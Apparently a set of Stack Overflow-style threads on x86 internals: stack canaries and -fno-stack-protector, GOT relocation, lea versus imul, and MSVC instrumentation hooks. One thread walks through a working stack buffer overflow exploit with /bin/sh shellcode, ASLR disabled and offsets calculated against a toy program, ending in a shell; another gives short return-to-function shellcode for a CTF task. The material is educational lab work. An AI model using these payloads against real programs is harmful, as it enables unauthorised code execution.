Who is responsible for inserting the stack canaries in the stack? Is it the OS?
If yes, how can the gcc compiler disable them by using the -fno-stack-protector option? Or it is only a flag created using that option and added to the binary to tell the OS to not insert canaries in the stack where the binary is loaded at runtime?
EDIT: one more question
Who checks the value of the canaries if they were changed over the execution?
Again if inserted by the compiler, how can be checked by the OS? If inserted by the OS how can it be disabled by the compiler (main question)?
Who is responsible for inserting the stack canaries in the stack?
The compiler. The code for creating and checking stack canaries is a subset of the code generated by the compiler from the program source code.
For GCC:
-fstack-protector
Emit extra code to check for buffer overflows, such as stack smashing attacks. This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.
The aforementioned "guard variable" is commonly referred to as a canary:
The basic idea behind stack protection is to push a "canary" (a randomly chosen integer) on the stack just after the function return pointer has been pushed. The canary value is then checked before the function returns; if it has changed, the program will abort. Generally, stack buffer overflow (aka "stack smashing") attacks will have to change the value of the canary as they write beyond the end of the buffer before they can get to the return pointer. Since the value of the canary is unknown to the attacker, it cannot be replaced by the attack. Thus, the stack protection allows the program to abort when that happens rather than return to wherever the attacker wanted it to go.1
Example program:
Source code:
int test(int i) {
return i;
}
int main(void) {
int x;
int i = 10;
x = test(i);
return x;
}
Function from binary compiled without -fstack-protector-all:
$ objdump -dj .text test | grep -A7 "<test>:"
00000000004004ed <test>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d fc mov %edi,-0x4(%rbp)
4004f4: 8b 45 fc mov -0x4(%rbp),%eax
4004f7: 5d pop %rbp
4004f8: c3 retq
Function from binary compiled with -fstack-protector-all:
$ objdump -dj .text protected_test | grep -A20 "<test>:"
000000000040055d <test>:
40055d: 55 push %rbp
40055e: 48 89 e5 mov %rsp,%rbp
400561: 48 83 ec 20 sub $0x20,%rsp
400565: 89 7d ec mov %edi,-0x14(%rbp)
400568: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax <- get guard variable value
40056f: 00 00
400571: 48 89 45 f8 mov %rax,-0x8(%rbp) <- save guard variable on stack
400575: 31 c0 xor %eax,%eax
400577: 8b 45 ec mov -0x14(%rbp),%eax
40057a: 48 8b 55 f8 mov -0x8(%rbp),%rdx <- move it to register
40057e: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx <- check it against original
400585: 00 00
400587: 74 05 je 40058e <test+0x31>
400589: e8 b2 fe ff ff callq 400440 <__stack_chk_fail#plt>
40058e: c9 leaveq
40058f: c3 retq
1. "Strong" stack protection for GCC
Related
I am trying to take control of this program with a shellcode.
#include <string.h>
#include <stdio.h>
void func (char * arg)
{
char name [32];
strcpy (name, arg);
printf ("\ nHello% s \ n \ n", name);
}
int main (int argc, char * argv [])
{
if (argc! = 2) {
printf ("Usage:% s NAME \ n", argv [0]);
exit (0);
}
func (argv [1]);
printf ("End of program \ n \ n");
return 0;
}
With 40 Aes, this is when the segment violation occurs and therefore the EIP record has been overwritten. Since my shellcode is 23 characters long, I input 17 Aes to exploit it. But I need the address of the beginning of the "name" buffer for the shellcode to run there.
In this case, as there is only one variable, it would be worth knowing the address of ESP, since, being the top of the stack, it will match.
I've seen this program that gets you an address close to ESP:
#include <stdio.h>
unsigned long get_sp (void) {
__asm __ ("movl% esp,% eax");
}
leading void () {
printf ("0x% x \ n", get_sp ());
}
However, I always get the segment violation signal, executing the following:
./my_program `perl -e 'print" \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80 ". "A" x17. "ESP address" '`
The program is compiled like this:
gcc -fno-stack-protector -D_FORTIFY_SOURCE = 0 -z norelro -z execstack my_program.c -o my_program
How can I get the extreme address of the beginning of the buffer or ESP?
0. Turn ASLR off
To do it easily, we can disable ASLR. In real world exploit, we will need to brute force the address as the address is randomized.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
1. Compilation
ammarfaizi2#integral:~/ex/exp$ cat my_program.c
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
void func(char *arg)
{
char name[32];
strcpy(name, arg);
printf("\nHello %s \n\n", name);
}
int main(int argc, char *argv[])
{
if (argc != 2) {
printf("Usage: %s NAME \n", argv[0]);
exit(0);
}
func(argv[1]);
printf("End of program \n\n");
return 0;
}
ammarfaizi2#integral:~/ex/exp$ gcc -fno-stack-protector -zexecstack -m32 my_program.c -o my_program
ammarfaizi2#integral:~/ex/exp$
2. Calculating Offset
0000122d <func>:
122d: f3 0f 1e fb endbr32
1231: 55 push %ebp
1232: 89 e5 mov %esp,%ebp
/*
*
* At this point, we know what return address is located at
* 0x4(%ebp).
*
*/
1234: 53 push %ebx
1235: 83 ec 24 sub $0x24,%esp
1238: e8 f3 fe ff ff call 1130 <__x86.get_pc_thunk.bx>
123d: 81 c3 8f 2d 00 00 add $0x2d8f,%ebx
1243: 83 ec 08 sub $0x8,%esp
1246: ff 75 08 push 0x8(%ebp)
1249: 8d 45 d8 lea -0x28(%ebp),%eax
124c: 50 push %eax
124d: e8 5e fe ff ff call 10b0 <strcpy#plt>
/*
*
* At this point, we know that the command line argument
* is copied to -0x28(%ebp)
*
*/
1252: 83 c4 10 add $0x10,%esp
1255: 83 ec 08 sub $0x8,%esp
1258: 8d 45 d8 lea -0x28(%ebp),%eax
125b: 50 push %eax
125c: 8d 83 3c e0 ff ff lea -0x1fc4(%ebx),%eax
1262: 50 push %eax
1263: e8 38 fe ff ff call 10a0 <printf#plt>
1268: 83 c4 10 add $0x10,%esp
126b: 90 nop
126c: 8b 5d fc mov -0x4(%ebp),%ebx
126f: c9 leave
1270: c3 ret
To overwrite return address from -0x28(%ebp), we need to write 0x4 - (-0x28) bytes (44 bytes).
We have 23 bytes shell code.
We need 21 bytes padding to make our payload be 44 bytes to reach return address.
We need 4 bytes malicious return address, we take \x11\x11\x11\x11 at the moment, as we don't yet know.
Test Execute
ammarfaizi2#integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x11\x11\x11\x11"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
ammarfaizi2#integral:~/ex/exp$ dmesg | tail -n 2
[56448.175467] my_program[117895]: segfault at 11111111 ip 0000000011111111 sp 00000000ffffd3c0 error 14 in my_program[56555000+1000]
[56448.175493] Code: Bad RIP value.
ammarfaizi2#integral:~/ex/exp$
At this point we have been able to overwrite EIP value. So the next is to find the shell code address.
3. Finding Shell Code Address
Notice that segfault happens when the leave and ret undo the esp value. So we need to find how many bytes is subtracted when func stack frame is created.
Notice how esp changes
; From main function
call func ; -4 bytes
; Setup stack frame
push %ebp ; -4 bytes
mov %esp,%ebp ; At this point %ebp = %esp
We undo -8 bytes, and our shell code is located -0x28(%ebp). So we have -48 bytes total.
Last segfault is at SP = 0xffffd3c0
Hence target return address is 0xffffd3c0 - 48 = 0xffffd390.
4. Execute Exploit
Notice that x86 is little endian byte order, so we need to reverse our payload (by byte).
ffffd390 we write it as \x90\xd3\xff\xff.
So Replace \x11\x11\x11\x11 with \x90\xd3\xff\xff
ammarfaizi2#integral:~/ex/exp$ ./my_program $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","A"x21,"\x90\xd3\xff\xff"')
Hello 1�Ph//shh/bin��PS��
AAAAAAAAAAAAAAAAAAAAA����
$ date
Sat Apr 3 14:47:02 WIB 2021
$ whoami
ammarfaizi2
$ exit
ammarfaizi2#integral:~/ex/exp$
1. Turn off ASLR and compilation
cat /proc/sys/kernel/randomize_va_space
0
gcc -fno-stack-protector -zexecstack -m32 prog.c -o prog2
08048474 <func>:
8048474: 55 push %ebp
8048475: 89 e5 mov %esp,%ebp
8048477: 83 ec 38 sub $0x38,%esp
804847a: 8b 45 08 mov 0x8(%ebp),%eax
804847d: 89 44 24 04 mov %eax,0x4(%esp)
8048481: 8d 45 d8 lea -0x28(%ebp),%eax
8048484: 89 04 24 mov %eax,(%esp)
8048487: e8 e4 fe ff ff call 8048370 <strcpy#plt>
804848c: b8 d0 85 04 08 mov $0x80485d0,%eax
8048491: 8d 55 d8 lea -0x28(%ebp),%edx
8048494: 89 54 24 04 mov %edx,0x4(%esp)
8048498: 89 04 24 mov %eax,(%esp)
804849b: e8 c0 fe ff ff call 8048360 <printf#plt>
80484a0: c9 leave
80484a1: c3 ret
080484a2 <main>:
80484a2: 55 push %ebp
80484a3: 89 e5 mov %esp,%ebp
80484a5: 83 e4 f0 and $0xfffffff0,%esp
80484a8: 83 ec 10 sub $0x10,%esp
80484ab: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484af: 74 22 je 80484d3 <main+0x31>
80484b1: 8b 45 0c mov 0xc(%ebp),%eax
80484b4: 8b 10 mov (%eax),%edx
80484b6: b8 f5 85 04 08 mov $0x80485f5,%eax
80484bb: 89 54 24 04 mov %edx,0x4(%esp)
80484bf: 89 04 24 mov %eax,(%esp)
80484c2: e8 99 fe ff ff call 8048360 <printf#plt>
80484c7: c7 04 24 00 00 00 00 movl $0x0,(%esp)
80484ce: e8 cd fe ff ff call 80483a0 <exit#plt>
80484d3: 8b 45 0c mov 0xc(%ebp),%eax
80484d6: 83 c0 04 add $0x4,%eax
80484d9: 8b 00 mov (%eax),%eax
80484db: 89 04 24 mov %eax,(%esp)
80484de: e8 91 ff ff ff call 8048474 <func>
80484e3: c7 04 24 05 86 04 08 movl $0x8048605,(%esp)
80484ea: e8 91 fe ff ff call 8048380 <puts#plt>
80484ef: b8 00 00 00 00 mov $0x0,%eax
80484f4: c9 leave
80484f5: c3 ret
2. Test Excute
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x11\x11\x11\x11"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
dmesg | tail -n 2
[82020.945063] prog2[11078]: segfault at d0080484 ip bffff71c sp bffff760 error 5
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
Last segfault is at 0xbffff760, so: 0xbffff760 - 48 = 0xbffff718
./prog2 $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "A" x21 . "\x18\xf7\xff\xbf"')
Hello 1▒Ph//shh/bin▒▒PS▒▒
̀AAAAAAAAAAAAAAAAAAAAA▒▒▒
Segmentation fault (core dumped)
dmesg | tail -n 2
[82669.199863] prog2[11100]: segfault at 11111111 ip 11111111 sp bffff760 error 14
[82857.841068] prog2[11108] general protection ip:bffff718 sp:bffff760 error:0
I have the following dump taken from gdb
00000000004006f6 <win>:
4006f6: 55 push rbp
4006f7: 48 89 e5 mov rbp,rsp
4006fa: bf 98 08 40 00 mov edi,0x400898
4006ff: e8 8c fe ff ff call 400590 <system#plt>
400704: 5d pop rbp
400705: c3 ret
Usually this C function is never called however I need to write some shellcode thats less then 10 bytes to run it or get the value displayed. Here is the source of the function;
void win(){
system("/bin/cat ./flag.txt");
}
I'm still a novice at both assembly and C, so any help is appreciated.
In order to run function win() you must do write push <function-win-address> ret in shellcode.
In your case that will be:
\x68\xf6\x06\x40\xc3
\x68 is push
\xf6\x06\x40 is the function address
\xc3 is ret
mov eax, (win addr)
call eax
objdump opcodes after
This question already has an answer here:
x86 Multiplication with 3: IMUL vs SHL + ADD
(1 answer)
Closed 1 year ago.
Let's consider the following function:
#include <stdint.h>
uint64_t foo(uint64_t x) { return x * 3; }
If I were to write it, I'd do
.global foo
.text
foo:
imul %rax, %rdi, $0x3
ret
On the other hand, the compiler generates two additions, with -O0:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: 48 89 7d f8 mov %rdi,-0x8(%rbp)
8: 48 8b 55 f8 mov -0x8(%rbp),%rdx
c: 48 89 d0 mov %rdx,%rax
f: 48 01 c0 add %rax,%rax
12: 48 01 d0 add %rdx,%rax
15: 5d pop %rbp
16: c3 retq
or lea with -O2:
0000000000000000 <foo>:
0: 48 8d 04 7f lea (%rdi,%rdi,2),%rax
4: c3 retq
Why? Since every assembly instruction equals one processor clock tick, my version should run within 2 CPU clock cycles (since it has two instructions), in the -O0 we need 4 cycles for performing addition, because it could be rewritten to
mov %rdi,%rax
add %rax,%rax
add %rdi,%rax
retq
and the lea should take two cycles either.
You're targeting a processor with dedicated address-calculation units. It's likely to be faster to compute small multiplications in the address calculator than in a general-purpose arithmetic/logic unit (ALU).
Also, depending on your processor model, the ALU may be shared with other code, either due to hyperthreading or by speculative or out-of-order execution within the same thread. Your compiler is making a good estimate of how best to utilise the available resources to give a good throughput of execution without stalling.
The idea that "every assembly instruction equals one processor clock tick" (or even a fixed number of cycles) has only ever been true on the very simplest of processors.
I now understand how dynamic functions are referenced, by procedure linkage table like below:
Dump of assembler code for function foo#plt:
0x0000000000400528 <foo#plt+0>: jmpq *0x2004d2(%rip) # 0x600a00 <_GLOBAL_OFFSET_TABLE_+40>
0x000000000040052e <foo#plt+6>: pushq $0x2
0x0000000000400533 <foo#plt+11>: jmpq 0x4004f8
(gdb) disas 0x4004f8
No function contains specified address.
But I don't know how dynamic variables are referenced,though I found the values are populated in the GOT once started,but there's no stub like above,how does it work?
The dynamic loader relocates all references to variables before transferring control to the user program.
There is no "stub" for them, because once the user program starts executing, it is not possible for the loader to regain control and update variable addresses. If this isn't clear to you, then you have not really understood how the PLT lazy-resolution stub works.
Global variables are accessed indirectly, via a global offset table.
When compiling a program, the compiler generates code that performs
indirect accesses, and emits relocation information specifying the
entry in the global offset table being used.
The linker performs these relocations when creating the final
dynamically loadable object, resulting in machine code that does not
need further patching at load time.
To see this in action, consider the following code fragment.
int v1;
int f(void) { return !v1; }
The function f references a global v1. The machine code generated
for the function looks like the following (on an i386):
% gcc -c -fpic a.c
% objdump --disassemble --reloc a.o
[snip]
Disassembly of section .text:
00000000 <f>:
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: e8 fc ff ff ff call 4 <f+0x4>
4: R_386_PC32 __i686.get_pc_thunk.cx
8: 81 c1 02 00 00 00 add $0x2,%ecx
a: R_386_GOTPC _GLOBAL_OFFSET_TABLE_
e: 8b 81 00 00 00 00 mov 0x0(%ecx),%eax
10: R_386_GOT32 v1
14: 8b 00 mov (%eax),%eax
16: 85 c0 test %eax,%eax
18: 0f 94 c0 sete %al
1b: 0f b6 c0 movzbl %al,%eax
1e: 5d pop %ebp
1f: c3 ret
Disassembly of section .text.__i686.get_pc_thunk.cx:
00000000 <__i686.get_pc_thunk.cx>:
0: 8b 0c 24 mov (%esp),%ecx
3: c3 ret
Machine code walk-through:
(Offsets 0x0 and 0x1) The standard function prologue.
(Offset 0x3) The call to __i686.get_pc_thunk.cx prepares for
PC-relative addressing by loading the address of the instruction
after the call into register %ecx.
(Offset 0x8) The value in %ecx is adjusted to point to the start
of the global offset table. This adjustment is signalled by the
relocation entry of type R_386_GOTPC.
(Offset 0xE) The address of global v1 is retrieved. The
R_386_GOT32 relocation supplies the offset of v1's entry from
the base of the global offset table.
(Offset 0x14) The value in v1 is retrieved into register %eax.
(Offsets 0x16--0x1F) The rest of the computation for function f.
In the final shared object, the linker patches the function's code to
the following:
% gcc -shared -o a.so a.o
% objdump --disassemble a.so
...snip...
0000044c <f>:
44c: 55 push %ebp
44d: 89 e5 mov %esp,%ebp
44f: e8 18 00 00 00 call 46c <__i686.get_pc_thunk.cx>
454: 81 c1 a0 1b 00 00 add $0x1ba0,%ecx
45a: 8b 81 f8 ff ff ff mov -0x8(%ecx),%eax
460: 8b 00 mov (%eax),%eax
462: 85 c0 test %eax,%eax
...snip...
Assuming that the object gets loaded at offset O in memory, the
call instruction at offset 0x44F will load O+0x454+0x1BA0, i.e.,
O+0x1FF4 into %ecx.
The instruction at offset 0x45A subtracts 8 from %ecx
to get the address of the slot for v1 in the global offset table,
i.e., the slot for v1 is at offset 0x1FEC from the start of the
shared object.
Looking at the dynamic relocation records for the shared object, we
see a relocation record instructing the runtime loader to store the
actual address for v1 at offset 0x1FEC.
% objdump -R a.so
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
...snip...
00001fec R_386_GLOB_DAT v1
...snip...
Further reading:
Pat Beirne's "Study of ELF loading and relocs" has more information about ELF relocations.
There are compiler options in MSVC to enable the automatic generation of instrumentation calls on entering and exiting functions. These hooks are called _penter() and _pexit(). The options to the compiler are:
/Gh Enable _penter Hook Function
/GH Enable _pexit Hook Function
Is there a pragma or some sort of function declaration that will turn off the instrumentation on a per function basis? I know that using __declspec(naked) functions will not be instrumented but this isn't always a very practical option. I'm using MSVC both on PC and on a non-X86 platform and the non-X86 platform is a pain to manually write epilog/prolog in assembler (not to mention it messes up the debugger stack tracing).
If this in only on a per file (compiler option) basis, I think I will have to split out the special functions into a separate file to turn the option off but it'd be much easier if I could just control it on a per file basis.
The fallback plan if this can't be done is to just move the functions to their own CPP translation unit and compile separately without the options.
I don't see any way to do this. Given that you would have to locate and handle every affected function anyway, perhaps moving them into their own module(s) is not such a big deal.
Asker is aware, but worth writing out the disqualified approach for future reference. /Gh and /GH do not instrument naked functions. You can declare the function you want to opt-out for as naked and manually supply the standard prolog/epilog, as shown below,
void instrumented_fn(void *p)
{
/* Function body */
}
__declspec(naked) void uninstrumented_fn(void *p)
{
__asm
{
/* prolog */
push ebp
mov ebp, esp
sub esp, __LOCAL_SIZE
}
/* Function body */
__asm
{
/* epilog */
mov esp, ebp
pop ebp
ret
}
}
An example instrumented function disassembly, showing calls to penter and pexit,
537b0: e8 7c d9 ff ff call 0x51131
537b5: 55 push %ebp
537b6: 8b ec mov %esp,%ebp
537b8: 83 ec 40 sub $0x40,%esp
537bb: 53 push %ebx
537bc: 56 push %esi
537bd: 57 push %edi
537be: 90 nop
537bf: 90 nop
537c0: 90 nop
537c1: 5f pop %edi
537c2: 5e pop %esi
537c3: 5b pop %ebx
537c4: 8b e5 mov %ebp,%esp
537c6: 5d pop %ebp
537c7: e8 01 d9 ff ff call 0x510cd
537cc: c3 ret
The equivalent uninstrumented function disassembly (naked body plus standard prolog/epilog)
51730: 55 push %ebp
51731: 8b ec mov %esp,%ebp
51733: 83 ec 40 sub $0x40,%esp
51736: 90 nop
51737: 90 nop
51738: 90 nop
51739: 8b e5 mov %ebp,%esp
5173b: 5d pop %ebp
5173c: c3 ret